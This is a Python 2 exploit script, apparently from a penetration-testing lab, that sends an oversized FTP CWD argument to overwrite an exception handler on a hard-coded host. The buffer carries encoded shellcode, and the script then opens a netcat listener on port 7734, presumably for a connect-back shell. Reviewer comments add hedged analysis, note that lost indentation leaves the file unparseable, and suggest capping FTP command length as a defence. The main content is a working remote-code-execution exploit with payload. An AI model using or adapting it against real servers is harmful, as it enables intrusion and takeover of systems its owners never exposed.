#!/usr/bin/python
import sys
import socket
import struct
import subprocess
# Builds the oversized argument that the script later sends in an FTP CWD command.
# Python 2 source: str literals are byte strings, so the '\x..' escapes below
# go onto the wire as raw bytes.

# Hard-coded target address (192.168.0.0/16 private range).
rhost = '192.168.1.100'
# Opaque machine-code blob. What it does cannot be read off this listing.
# NOTE(review): the script later starts a listener on TCP 7734, so this is
# presumably a connect-back payload - confirm by analysis in an isolated lab,
# not by running it.
shellcode = ""
shellcode += "\xda\xde\xba\x14\x94\xe3\x10\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13\x03\x41"
shellcode += "\x87\x01\xe5\x95\x4f\x47\x06\x65\x90\x28\x8e\x80"
shellcode += "\xa1\x68\xf4\xc1\x92\x58\x7e\x87\x1e\x12\xd2\x33"
shellcode += "\x94\x56\xfb\x34\x1d\xdc\xdd\x7b\x9e\x4d\x1d\x1a"
shellcode += "\x1c\x8c\x72\xfc\x1d\x5f\x87\xfd\x5a\x82\x6a\xaf"
shellcode += "\x33\xc8\xd9\x5f\x37\x84\xe1\xd4\x0b\x08\x62\x09"
shellcode += "\xdb\x2b\x43\x9c\x57\x72\x43\x1f\xbb\x0e\xca\x07"
shellcode += "\xd8\x2b\x84\xbc\x2a\xc7\x17\x14\x63\x28\xbb\x59"
shellcode += "\x4b\xdb\xc5\x9e\x6c\x04\xb0\xd6\x8e\xb9\xc3\x2d"
shellcode += "\xec\x65\x41\xb5\x56\xed\xf1\x11\x66\x22\x67\xd2"
shellcode += "\x64\x8f\xe3\xbc\x68\x0e\x27\xb7\x95\x9b\xc6\x17"
shellcode += "\x1c\xdf\xec\xb3\x44\xbb\x8d\xe2\x20\x6a\xb1\xf4"
shellcode += "\x8a\xd3\x17\x7f\x26\x07\x2a\x22\x2f\xe4\x07\xdc"
shellcode += "\xaf\x62\x1f\xaf\x9d\x2d\x8b\x27\xae\xa6\x15\xb0"
shellcode += "\xd1\x9c\xe2\x2e\x2c\x1f\x13\x67\xeb\x4b\x43\x1f"
shellcode += "\xda\xf3\x08\xdf\xe3\x21\x9e\x8f\x4b\x9a\x5f\x7f"
shellcode += "\x2c\x4a\x08\x95\xa3\xb5\x28\x96\x69\xde\xc3\x6d"
shellcode += "\xfa\x21\xbb\x6c\x92\xc9\xbe\x6e\x7c\x3c\x36\x88"
shellcode += "\xea\x50\x1e\x03\x83\xc9\x3b\xdf\x32\x15\x96\x9a"
shellcode += "\x75\x9d\x15\x5b\x3b\x56\x53\x4f\xac\x96\x2e\x2d"
shellcode += "\x7b\xa8\x84\x59\xe7\x3b\x43\x99\x6e\x20\xdc\xce"
shellcode += "\x27\x96\x15\x9a\xd5\x81\x8f\xb8\x27\x57\xf7\x78"
shellcode += "\xfc\xa4\xf6\x81\x71\x90\xdc\x91\x4f\x19\x59\xc5"
shellcode += "\x1f\x4c\x37\xb3\xd9\x26\xf9\x6d\xb0\x95\x53\xf9"
shellcode += "\x45\xd6\x63\x7f\x4a\x33\x12\x9f\xfb\xea\x63\xa0"
shellcode += "\x34\x7b\x64\xd9\x28\x1b\x8b\x30\xe9\x2b\xc6\x18"
shellcode += "\x58\xa4\x8f\xc9\xd8\xa9\x2f\x24\x1e\xd4\xb3\xcc"
shellcode += "\xdf\x23\xab\xa5\xda\x68\x6b\x56\x97\xe1\x1e\x58"
shellcode += "\x04\x01\x0b"
# Buffer layout, in order: 1037 filler bytes, two packed 32-bit values,
# 32 bytes of 0x90, the blob above, then 0xCC padding.
# The padding is sized as 2000 minus the blob length, so the total is always
# 1037 + 4 + 4 + 32 + 2000 = 3077 bytes while the blob stays under 2000 bytes.
exploit = ''
exploit += '\x41' * 1037
# '<L' packs little-endian, so this goes out as the bytes 90 90 EB 06.
# NOTE(review): that pair of values after a fixed-length filler is consistent
# with an exception-handler-record overwrite on x86 - not confirmable from
# this listing alone.
exploit += struct.pack('<L', 0x06eb9090)
# Hard-coded 32-bit value; presumably an address inside the targeted server
# or one of its modules, which would tie the buffer to one specific build and
# to a module loaded at a fixed base (no ASLR/rebasing) - TODO confirm.
exploit += struct.pack('<L', 0x1220401e)
exploit += '\x90' * 32
exploit += shellcode
exploit += '\xcc' * (2000 - len(shellcode))
# Sends the prepared buffer to an FTP server on rhost:21 as the argument of a
# single CWD command, after logging in with a fixed account.
# NOTE(review): indentation was lost in this listing; the statements between
# `try:` and `except` are the try body, and the two lines after `except` are
# presumably its handler. As shown, the file does not parse.
# Python 2 syntax (`print` statements, str sent directly on the socket).
#
# Defender's view: the wire pattern is an authenticated FTP session followed by
# one CWD whose argument is roughly 3 KB of mostly non-printable bytes. Real
# path arguments are far shorter, so a length cap on FTP command lines (in the
# server or an inline inspection device) rejects this class of input, and
# oversized CWD arguments are a usable detection signal.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, 21))
# Each recv() only drains the server's reply; the content is never checked,
# so a failed login is not detected.
s.recv(2048)
s.send('USER offsec\r\n')
s.recv(2048)
s.send('PASS offsec\r\n')
s.recv(2048)
# The oversized buffer is sent as the CWD argument; the socket is closed
# without reading any reply.
s.send('CWD {}\r\n'.format(exploit))
s.close()
print 'Evil buffer sent!'
# Runs netcat in listen mode on TCP 7734 through the shell. The command is a
# constant string; with shell=True on POSIX the single list element is passed
# to the shell as the command line. Blocks until netcat exits.
subprocess.call(['nc -lvvp 7734'], shell=True)
# Any failure (connect, send, recv) is printed and the script exits with
# status 1.
except Exception as error:
print error
sys.exit(1)